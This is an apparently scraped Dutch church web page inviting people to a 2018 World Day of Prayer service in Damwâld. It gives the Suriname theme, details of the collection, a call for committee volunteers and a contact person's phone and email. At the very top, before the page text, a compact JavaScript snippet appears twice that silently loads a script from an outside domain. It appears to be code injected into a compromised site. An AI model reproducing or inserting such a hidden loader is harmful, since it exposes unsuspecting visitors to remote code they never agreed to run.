;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Uitnodiging Wereldgebedsdag 2018 - PKN Damwâld
2 maart 2018
19:30 t/m 20:30
Doopsgezinde Kerk Damwâld
Uitnodiging Wereldgebedsdag 2018

Deze wereldgebedsdienst wordt altijd op de eerste vrijdag van de maand maart gevierd en dit jaar is dit op 2 maart. Wereldgebedsdag heeft een lange traditie: in 1887 riepen Amerikaanse vrouwen op tot een gebedsdag in hun land. Deze oproep is uitgegroeid tot een wereldwijde dag van gebed waaraan door 183 landen wordt deelgenomen. Wereldgebedsdag heeft ieder jaar weer een ander thema uit een ander land. Dit jaar komt de orde van dienst uit Suriname. Thema: ‘God zag dat het goed was…’. Om onze wereldwijde gebeden voor Suriname ook praktisch ten uitvoer te brengen, wordt gecollecteerd voor diverse doelen in Suriname. Het Nederlands Comité Wereldgebedsdag heeft gekozen voor 4 projecten in 2018. De invulling van de dienst word verzorgt door een plaatselijke commissie van verschillende kerken. We als commissie zijn nog steeds zoekende naar nieuwe commissie leden. Wilt u meer info over commissielid of voelt u zich geroepen, schroom niet en meld u aan of vraag om info. Dit kan ook na de viering bij een van de commissieleden. Iedereen van jong tot oud is van harte welkom.

Met vriendelijke groet,

Wereldgebedsdagcommissie Damwâld e.o.

Lourenske Herrema tel.0511-702643 /06-49812249 / cavie@live.nl

Locatie: Doopsgezinde Kerk DamwâldDoniawei 34 Damwâld